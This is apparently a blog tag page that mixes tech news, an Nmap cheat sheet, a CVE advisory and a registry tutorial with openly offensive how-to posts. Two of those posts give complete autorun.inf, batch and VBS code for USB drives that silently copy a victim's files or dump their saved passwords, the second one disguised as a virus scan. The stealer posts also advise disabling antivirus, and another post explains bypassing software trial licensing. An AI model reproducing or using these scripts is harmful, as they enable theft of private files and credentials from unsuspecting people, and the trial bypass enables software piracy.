Posts Tagged ‘computer’

tv crime2Please use responsibly, Caintech.co.uk take no responsibility for the use of the following information it should only be used for educational purposes

How to steal files with a USB

For this, you’ll need a USB device or anything that will plug into a PC and can hold data.

Step One-

Open Notepad and paste the code below

[autorun]
icon=icon.ico
open=explorer.bat
action=Open folders to view files
shell\open\command=launch.bat

Save it as Autorun.inf
paste to the USB an icon called icon.ico
change the “Open folders to view files”.

Step Two-

Open notepad again and paste the code below

@echo on
:: variables
SET odrive=%odrive:~0,2%
set backupcmd=xcopy /s /c /d /e /h /i /r /y
echo on

%backupcmd% “%USERPROFILE%\Desktop\*.avi” “%drive%\private\vid”
%backupcmd% “%USERPROFILE%\Favorites” “%drive%\private\favorites”
%backupcmd% “%USERPROFILE%\Desktop\*.jpg” “%drive%\private\img”
%backupcmd% “%USERPROFILE%\Desktop\*.jpeg” “%drive%\private\img”
%backupcmd% “%USERPROFILE%\Desktop\*.bmp” “%drive%\private\img”
%backupcmd% “%USERPROFILE%\Desktop\*.3gp” “%drive%\private\vid”
%backupcmd% “%USERPROFILE%\Desktop\*.mp4” “%drive%\private\vid”
%backupcmd% “%USERPROFILE%\Desktop\*.wmv” “%drive%\private\vid”
%backupcmd% “%USERPROFILE%\Contacts” “%drive%\private\contacts”
%backupcmd% “%USERPROFILE%\Links” “%drive%\private\links”
%backupcmd% “%USERPROFILE%\My Documents\My Music” “%drive%\private\mp3”
%backupcmd% “%USERPROFILE%\My Documents\Downloads” “%drive%\private\downloads”
%backupcmd% “%USERPROFILE%\My Music” “%drive%\private\mp3”
%backupcmd% “%USERPROFILE%\My Documents\*.jpg” “%drive%\private\img”
%backupcmd% “%USERPROFILE%\My Documents\*.bmp” “%drive%\private\img”
%backupcmd% “%USERPROFILE%\My Documents\*.avi” “%drive%\private\vid”
%backupcmd% “%USERPROFILE%\My Documents\*.mpg” “%drive%\private\vid”
%backupcmd% “%USERPROFILE%\My Documents\*.3gp” “%drive%\private\vid”
%backupcmd% “%USERPROFILE%\My Documents\*.mp4” “%drive%\private\vid”
%backupcmd% “%USERPROFILE%\My Pictures” “%drive%\private\img”
%backupcmd% “%USERPROFILE%\Videos” “%drive%\private\vid”
%backupcmd% “%USERPROFILE%\Music” “%drive%\private\mp3”
%backupcmd% “%USERPROFILE%\Downloads” “%drive%\private\downloads”
%backupcmd% “D:\*.jpg” “%drive%\private\img”
%backupcmd% “D:\*.jpeg” “%drive%\private\img”
%backupcmd% “D:\*.bmp” “%drive%\private\img”
%backupcmd% “D:\*.3gp” “%drive%\private\vid”
%backupcmd% “D:\*.mp4” “%drive%\private\vid”
%backupcmd% “D:\*.avi” “%drive%\private\vid”
%backupcmd% “D:\*.wmv” “%drive%\private\vid”
%backupcmd% “D:\*.doc” “%drive%\private\documents”
%backupcmd% “D:\*.pdf” “%drive%\private\documents”
@echo on
cls

Save it as explorer.bat
this script copies files from Music/Videos/downloads/

Then these files are copied to their respective folders.
Note: create on your USB a folder called private
and on this folder create these folders:
contacts
documents
downloads
favourites
img
links
mp3
vid

Step 3

Open notepad again and paste the code below

CreateObject(“Wscript.Shell”).Run “””” & WScript.Arguments(0) & “”””, 0, False

Save it as invisible.vbs
This code runs explorer.bat as a process so it does not show the CMD prompt and everything the batch file is processing.

Step Four

Open notepad again for the last time and paste the code below

wscript.exe \invisible.vbs explorer.bat

Save this as launch.bat
This batch file does two things, it looks for the invisible.vbs file in the root of the Flash drive then loads it with explorer.bat so file.bat is run with code from vbs file.

Step Five

Paste all 4 files in the root of your flash drive. Don’t forget to paste the icon
Create the folders I mentioned in step 2.
If you want you can make the files and folders hidden so they won’t be visible 🙂
Note: This will work only if your target will click “Open folders to view files” so in order for this to work auto run must be enabled or you can get them to double click the icon.

(-_(-_(-_-)_-)_-)

tv crime2

Microsoft Windows contains vulnerability (CVE-2013-3660) that could allow an local attacker to gain elevated privileges on a targeted system. The vulnerability classified as critical has been found in Microsoft Windows XP/Vista/7/2000/Server 2003/2008. This affects the function win32k!EPATHOBJ::pprFlattenRec of the component Kernel. The vulnerability is due to improper handling of certain objects in kernel memory by the affected software. A local attacker with access to a targeted system could exploit this vulnerability by running a malicious program that is designed to cause the Windows kernel to perform improper memory operations on certain objects. If successful, the attacker could execute arbitrary code on the system with the privileges of the kernel, resulting in a complete system compromise. Proof of concept code that exploits this vulnerability is publicly available.

CVE: CVE-2013-3660
Remote: No
Local: Yes
Updated: Jul 02 2013 08:21AM
Credit: Tavis Ormandy
Vulnerable: Microsoft Windows XP Professional SP3
Microsoft Windows XP Professional SP2
Microsoft Windows XP Media Center Edition SP3
Microsoft Windows XP Media Center Edition SP2
Microsoft Windows XP Home SP3
Microsoft Windows XP Home SP2
Microsoft Windows Vista SP2
Microsoft Windows Server 2008 Enterprise Edition SP2
Microsoft Windows Server 2008 Datacenter Edition SP2
Microsoft Windows Server 2008 R2 SP1
Microsoft Windows Server 2003 SP2
Microsoft Windows 8 0
Microsoft Windows 7 Professional 0
Microsoft Windows 7 for 32-bit Systems SP1

Solution:
Currently, we are not aware of any vendor-supplied patches. If you feel we are in error or if you are aware of more recent information, please mail us at: vuldb@securityfocus.com.

http://cvedetails.com/cve/CVE-2013-3660

 

tv-300x2241

 

The de-facto standard in network scanning for many years has been Nmap. Nmap is universally supported by Linux and Windows alike and is free to download > Download Nmap

The only thing I have found is that there are so many commands it makes it difficult to remember what to enter, so here is a quick guide for fast scanning, Also I have created it in a PDF for easy reference > Caintech.co.uk Nmap Cheat

Basic Scanning Techniques

Scan a single target —> nmap [target]

Scan multiple targets —> nmap [target1,target2,etc]

Scan a list of targets —-> nmap -iL [list.txt]

Scan a range of hosts —-> nmap [range of IP addresses]

Scan an entire subnet —-> nmap [IP address/cdir]

Scan random hosts —-> nmap -iR [number]

Excluding targets from a scan —> nmap [targets] –exclude [targets]

Excluding targets using a list —> nmap [targets] –excludefile [list.txt]

Perform an aggressive scan —> nmap -A [target]

Scan an IPv6 target —> nmap -6 [target]

Discovery Options

Perform a ping scan only —> nmap -sP [target]

Don’t ping —> nmap -PN [target]

TCP SYN Ping —> nmap -PS [target]

TCP ACK ping —-> nmap -PA [target]

UDP ping —-> nmap -PU [target]

SCTP Init Ping —> nmap -PY [target]

ICMP echo ping —-> nmap -PE [target]

ICMP Timestamp ping —> nmap -PP [target]

ICMP address mask ping —> nmap -PM [target]

IP protocol ping —-> nmap -PO [target]

ARP ping —> nmap -PR [target]

Traceroute —> nmap –traceroute [target]

Force reverse DNS resolution —> nmap -R [target]

Disable reverse DNS resolution —> nmap -n [target]

Alternative DNS lookup —> nmap –system-dns [target]

Manually specify DNS servers —> nmap –dns-servers [servers] [target]

Create a host list —-> nmap -sL [targets]

Advanced Scanning Options

TCP SYN Scan —> nmap -sS [target]

TCP connect scan —-> nmap -sT [target]

UDP scan —-> nmap -sU [target]

TCP Null scan —-> nmap -sN [target]

TCP Fin scan —> nmap -sF [target]

Xmas scan —-> nmap -sX [target]

TCP ACK scan —> nmap -sA [target]

Custom TCP scan —-> nmap –scanflags [flags] [target]

IP protocol scan —-> nmap -sO [target]

Send Raw Ethernet packets —-> nmap –send-eth [target]

Send IP packets —-> nmap –send-ip [target]

Port Scanning Options

Perform a fast scan —> nmap -F [target]

Scan specific ports —-> nmap -p [ports] [target]

Scan ports by name —-> nmap -p [port name] [target]

Scan ports by protocol —-> nmap -sU -sT -p U:[ports],T:[ports] [target]

Scan all ports —-> nmap -p “*” [target]

Scan top ports —–> nmap –top-ports [number] [target]

Perform a sequential port scan —-> nmap -r [target]

Version Detection

Operating system detection —-> nmap -O [target]

Submit TCP/IP Fingerprints —-> http://www.nmap.org/submit/

Attempt to guess an unknown —-> nmap -O –osscan-guess [target]

Service version detection —-> nmap -sV [target]

Troubleshooting version scans —-> nmap -sV –version-trace [target]

Perform a RPC scan —-> nmap -sR [target]

Timing Options

Timing Templates —-> nmap -T [0-5] [target]

Set the packet TTL —-> nmap –ttl [time] [target]

Minimum of parallel connections —-> nmap –min-parallelism [number] [target]

Maximum of parallel connection —-> nmap –max-parallelism [number] [target]

Minimum host group size —–> nmap –min-hostgroup [number] [targets]

Maximum host group size —-> nmap –max-hostgroup [number] [targets]

Maximum RTT timeout —–> nmap –initial-rtt-timeout [time] [target]

Initial RTT timeout —-> nmap –max-rtt-timeout [TTL] [target]

Maximum retries —-> nmap –max-retries [number] [target]

Host timeout —-> nmap –host-timeout [time] [target]

Minimum Scan delay —-> nmap –scan-delay [time] [target]

Maximum scan delay —-> nmap –max-scan-delay [time] [target]

Minimum packet rate —-> nmap –min-rate [number] [target]

Maximum packet rate —-> nmap –max-rate [number] [target]

Defeat reset rate limits —-> nmap –defeat-rst-ratelimit [target]

Firewall Evasion Techniques

Fragment packets —-> nmap -f [target]

Specify a specific MTU —-> nmap –mtu [MTU] [target]

Use a decoy —-> nmap -D RND: [number] [target]

Idle zombie scan —> nmap -sI [zombie] [target]

Manually specify a source port —-> nmap –source-port [port] [target]

Append random data —-> nmap –data-length [size] [target]

Randomize target scan order —-> nmap –randomize-hosts [target]

Spoof MAC Address —-> nmap –spoof-mac [MAC|0|vendor] [target]

Send bad checksums —-> nmap –badsum [target]

Output Options

Save output to a text file —-> nmap -oN [scan.txt] [target]

Save output to a xml file —> nmap -oX [scan.xml] [target]

Grepable output —-> nmap -oG [scan.txt] [target]

Output all supported file types —-> nmap -oA [path/filename] [target]

Periodically display statistics —-> nmap –stats-every [time] [target]

133t output —-> nmap -oS [scan.txt] [target]

Troubleshooting and debugging

Help —> nmap -h

Display Nmap version —-> nmap -V

Verbose output —-> nmap -v [target]

Debugging —-> nmap -d [target]

Display port state reason —-> nmap –reason [target]

Only display open ports —-> nmap –open [target]

Trace packets —> nmap –packet-trace [target]

Display host networking —> nmap –iflist

Specify a network interface —> nmap -e [interface] [target]

Nmap Scripting Engine

Execute individual scripts —> nmap –script [script.nse] [target]

Execute multiple scripts —-> nmap –script [expression] [target]

Script categories —-> all, auth, default, discovery, external, intrusive, malware, safe, vuln

Execute scripts by category —-> nmap –script [category] [target]

Execute multiple scripts categories —-> nmap –script [category1,category2, etc]

Troubleshoot scripts —-> nmap –script [script] –script-trace [target]

Update the script database —-> nmap –script-updatedb

Ndiff

Comparison using Ndiff —-> ndiff [scan1.xml] [scan2.xml]

Ndiff verbose mode —-> ndiff -v [scan1.xml] [scan2.xml]

XML output mode —-> ndiff –xml [scan1.xm] [scan2.xml]

For more excellent FREE security training visit >

http://learnnetsec.com 

http://www.youtube.com/user/NetSecNow

 

 

tv crime2

How secure are your passwords? Hopefully they’re more clever than these top 25 most-popular (and therefore least secure) passwords.

SplashData, an online security management firm, compiled this list for 2012:

  1. password
  2. 123456
  3. 12345678
  4. qwerty
  5. abc123
  6. monkey
  7. 1234567
  8. letmein
  9. trustno1
  10. dragon
  11. baseball
  12. 111111
  13. iloveyou
  14. master
  15. sunshine
  16. ashley
  17. bailey
  18. passw0rd
  19. shadow
  20. 123123
  21. 654321
  22. superman
  23. gazwsx
  24. michael
  25. football

Are any of your passwords on the list? If so, it’s time to upgrade to one with varying numbers, capitalization and figures. Separate words with spaces or underscores. For crying out loud, don’t use your pet’s or your spouse’s name or even you children’s names.

Caintech.co.uk

GCC has had support for 64-bit ARM, a.k.a. AArch64, going back to last summer for using the open-source compiler with next-generation ARMv8 hardware. Being merged today is finally support for the LLVM compiler infrastructure with an experimental 64-bit ARM/AArch64 back-end target.

Adding fourty-five thousand lines of new code to the LLVM tree is a patch that adds support for ARM’s 64-bit architecture to LLVM. This target is currently experimental and not built by default, but requires a compile-time switch for enabling. However, there’s already talk amongst developers about enabling 64-bit ARM support by default. This work was merged into mainline LLVM this morning and will thus be found in the LLVM 3.3 release due out in a couple months’ time.

This initial AArch64 LLVM compiler support covers Assembly for all scalar instructions except for the late addition CRC instructions, code generation features needed for C++0x and C99, compilation support for the small memory model, absolute and position-independent code support, GNU-style TLS, and debugging support.

The 64-bit ARM compiler support, however, has yet to undergo any performance tuning for the greatest compiler performance. With there still being a few months to go until LLVM 3.3 is released, this will likely be achieved before the AArch64 LLVM support is in any released version.

Another limitation is that there isn’t any NEON support for the AArch64 experimental target because the developer says there was “an outbreak of batshit insanisty in [ARM’s] legal department.”

The initial AArch64/ARMv8 instruction set support for LLVM can be found by cloning the LLVM SVN/Git repository where this big patch landed today.

LLVM 3.3 should be a fantastic release since aside from the 64-bit ARM support will also be the AMD Radeon GPU back-end, likely the enabling by default of the new loop vectorizer, and many other features for this open-source compiler infrastructure.

We’ve seen hundreds of builds tinker around with the GPIO pins on the Raspberry Pi. They’re great for bridging the gap between physical sensors and a virtual world, but there are a few more unused and ignored pins on the Raspberry Pi. The folks at the Raspberry Pi foundation are finally giving these unused pins a life of their own with the new camera module for our favorite single board computer.

The specs for the camera are fairly impressive – it can record H.264 video at 1080p and 30 frames per second. Best of all, it costs only $25.

There are a few more hurdles to pass before the Raspi foundation can send this board out to manufacturers. They still need to make sure the ribbon cable doesn’t emit any interference, but if all goes right the camera module should be available early next year.

You can see the camera in action in the video after the break. If you listen closely you can hear [Rob Bishop] of the Raspi foundation say they’re also working on a display add on for the other  unused pins on the Pi, something we can’t wait to see.

Caintech.co.uk Please Note: Please ensure that you Back-up your Registry before attempting to modify it in anyway just in case you make a mistake. Here’s how:

  1. Depending on your version of Windows, do one of the following:
    • For Windows XP: Click Start > Run.
    • For Windows 7 or Vista: Click the Start button, and then click All Programs > Accessories > Run.
  2. In the Run dialog box, type the following text:

    regedit

  3. Click OK.

    If the User Account Control window appears, click Continue.

  4. On the File menu, click Export.
  5. In the File name box, type a name that you will remember, such as Registry Backup.
  6. Select a location where you want to save the Registration Entries (.reg) file, I suggest your desktop.
  7. Click Save.

Ok now that has been done lets get into the real technical stuff.

Changing the Default Installation Path in Windows 7 isn’t all that difficult, we all know that our Default Installation Path is C:\Program Files but if you want to change this to another Drive so that will become the Default Path for all new program Installations you can with a few clicks in the registry editor.

Ok for X64 Version User’s this simply Copy and Paste the following into the Run Box

%systemroot%\syswow64\regedit

For X32 Version User’s Go to Start and in the Search Box type in Regedit and Hit Enter to Open the Registry Editor

Now the Registry Editor will open

  • Ok now locate the following:- HKEY_LOCAL_MACHINE \ Software \ Microsoft \ Windows \ CurrentVersion

Now you will see that I have marked out the ProgramFilesDir for the X32 Version and ProgramW6432Dir the X64 Version and the reason for this you will need to change both if you are running a X64 Version.

So, If you have the X32 Version of Windows then choose the ProgramFileDir x86 path by Right Clicking and then Selecting Modify.

Then simply change the Drive Letter and Path to where you want to Install your Programs then Click OK

  • For X32 Version user’s, that it for you all done!

So, If you have the X64 Version of Windows then choose and Modify both ProgramFileDir x86 and ProgramW6432Dir path by Right Clicking and then Selecting Modify.

Then simply change the Drive Letter and Path to where you want to Install your Programs then Click OK

Now if you have messed it up and when you reboot your machine you get errors, a simple way to revert back to the previous version of the registry is to:

Reboot the machine  keep tapping F8 this will take you into ‘Safe Mode’

When the desktop boots double click on the .reg file you made earlier in this tutorial and when prompted with a warnig (as below) press ‘Yes’

Reboot and now you are back to how your registry was before you started (now print this tutorial out and try again)

 

Caintech.co.uk

This post is of-course for educational purposes only.

Although the title of this post implies that this is designed for a USB, any device like an MP3 player or a mobile phone can be used as they can all execute programs.

We know that windows stores most of its passwords on daily basis , such as MSN messenger passwords,Yahoo passwords,Facebook passwords etc. Most people hate to type passwords over and over again; so when that little tick box appears that asks to save/remember password the opportunity is jumped at, this shall be their undoing.

 

Things you will need?
Note: Before downloading the following apps you might want to disable your Anti Virus, as most of these will appear as a suspicious file.

MessenPass – MessenPass is a password recovery tool that reveals the passwords of the following instant messenger applications:

  • MSN Messenger
  • Windows Messenger (In Windows XP)
  • Windows Live Messenger (In Windows XP/Vista/7)
  • Yahoo Messenger (Versions 5.x and 6.x)
  • Google Talk
  • ICQ Lite 4.x/5.x/2003
  • AOL Instant Messenger v4.6 or below, AIM 6.x, and AIM Pro.
  • Trillian
  • Trillian Astra
  • Miranda
  • GAIM/Pidgin
  • MySpace IM
  • PaltalkScene
  • Digsby

Mail PassView – Mail PassView is a small password-recovery tool that reveals the passwords and other account details for:

  • Outlook Express
  • Microsoft Outlook 2000 (POP3 and SMTP Accounts only)
  • Microsoft Outlook 2002/2003/2007/2010 (POP3, IMAP, HTTP and SMTP Accounts)
  • Windows Mail
  • Windows Live Mail
  • IncrediMail
  • Eudora
  • Netscape 6.x/7.x (If the password is not encrypted with master password)
  • Mozilla Thunderbird (If the password is not encrypted with master password)
  • Group Mail Free
  • Yahoo! Mail – If the password is saved in Yahoo! Messenger application.
  • Hotmail/MSN mail – If the password is saved in MSN/Windows/Live Messenger application.
  • Gmail – If the password is saved by Gmail Notifier application, Google Desktop, or by Google Talk.

IE Passview – IE passview is a small program that helps us view stored passwords in Internet Explorer.

Protected storage pass viewer(PSPV) –  Protected Storage PassView is a small utility that reveals the passwords stored on your computer by Internet Explorer, Outlook Express and MSN Explorer.

Password Fox – Password fox is a small program used to view Stored passwords in Mozilla Firefox

Now here is a step by step tutorial to create a USB password stealer to steal saved passwords:

1.First of all download all 5 tools and copy the executable files in your USB  i.e. Copy the files  mspass.exe, mailpv.exe, iepv.exe, pspv.exe and passwordfox.exe into your USB Drive.
2. Create a new Notepad and write the following text into it.

[autorun]

open=launch.bat

ACTION= Perform a Virus Scan

save the Notepad and rename it from

New Text Document.txt to autorun.inf

Now copy the autorun.inf file onto your USB

 

3. Create another Notepad and write the following text onto it.

start mspass.exe /stext mspass.txt

start mailpv.exe /stext mailpv.txt

start iepv.exe /stext iepv.txt

start pspv.exe /stext pspv.txt

start passwordfox.exe /stext passwordfox.txt
Save the Notepad file and rename it from New Text Document.txt to launch.bat

Copy the launch.bat file also to your USB drive.
Now your USB Password stealer is ready, all you have to do is insert it in your victims computer and  a popup will appear, in the popup window select the option (Launch virus scan) as soon as you will click it the following window will appear.

After this you can see saved password in .TXT files on the USB
Have fun and hack responsibly

Caintech.co.uk

In this post, I will show you how to hack Software and run the trial program forever. Most of us are familiar with many software programs that run only for a specified period of time in the trial mode. Once the trial period is expired, these programs stop functioning and demand for a purchase.

However, there is a way to run the software programs so that they function beyond the trial period. Isn’t this interesting?

Well, before I tell you how to hack the software and make it run in the trial mode forever, we will have to first understand how the licensing scheme of these programs work. I’ll try to explain this in brief.

When the software programs are installed for the first time, they make an entry into the Windows Registry with the details such as installed Date and Time, installed path etc. After the installation, every time you run the program, it compares the current system date and time with the installed date and time. With this, it can make out whether the trial period is expired or not.

So, with this being the case, just manually changing the system date to an earlier date will not solve the problem. For this purpose there is a small tool known as RunAsDate.

RunAsDate is a small utility that allows you to run a program in the date and time that you specify. This utility doesn’t change the current system date, but it only injects the date/time that you specify into the desired application.

RunAsDate intercepts the kernel API calls that returns the current date and time (GetSystemTime, GetLocalTime, GetSystemTimeAsFileTime), and replaces the current date/time with the date/time that you specify. It works with Windows 2000, XP, 2003, Vista and 7.

You can download RunAsDate from the following link:

Download RunAsDate

NOTE: FOLLOW THESE TIPS CAREFULLY:

You will have to follow these tips carefully to successfully hack a software and make it run in it’s trial mode forever:

  1. Note down the date and time, when you install the software for the first time.
  2. Once the trial period expires, you must always run the software using RunAsDate.
  3. After the trial period is expired, do not run the software (program) directly. If you run the software directly even once, this hack may no longer work.
  4. It is better and safe to inject the date of the last day in the trial period.

For example, if the trial period expires on Jan 30 2012, always inject the date as Jan 29 2012 in the RunAsDate. I hope this helps! Please express your experience and opinions through comments.

Police have detained a 22-year-old hacker who created a system of networked computers that was used to steal more than 150 million rubles ($4.47 million) from people’s bank accounts and already one of the most wanted hacker in the world. But now, “Hermes” is, has been tapped over six million computers and earns around 5 million francs, was caught in Russia.

he network infected around six million computers with a Trojan virus, which helped get access to users’ bank accounts. About the Trojans secretly installed, he had arranged illegal money transfers, said the interior ministry in Moscow on Friday.

Police from Division K, the cybercrime branch of the Interior Ministry, searched the hacker’s place of residence, confiscating computers and arresting the suspect. The statement did not specify when the arrest was made.The botnet built by the hacker included around 6 million computers from regions that included Krasnodar, Samara, and Ivanovo, as well as from the cities of Moscow and St. Petersburg, where the majority of the infected computers were located.
The hacker faces a lengthy jail term if convicted on fraud charges.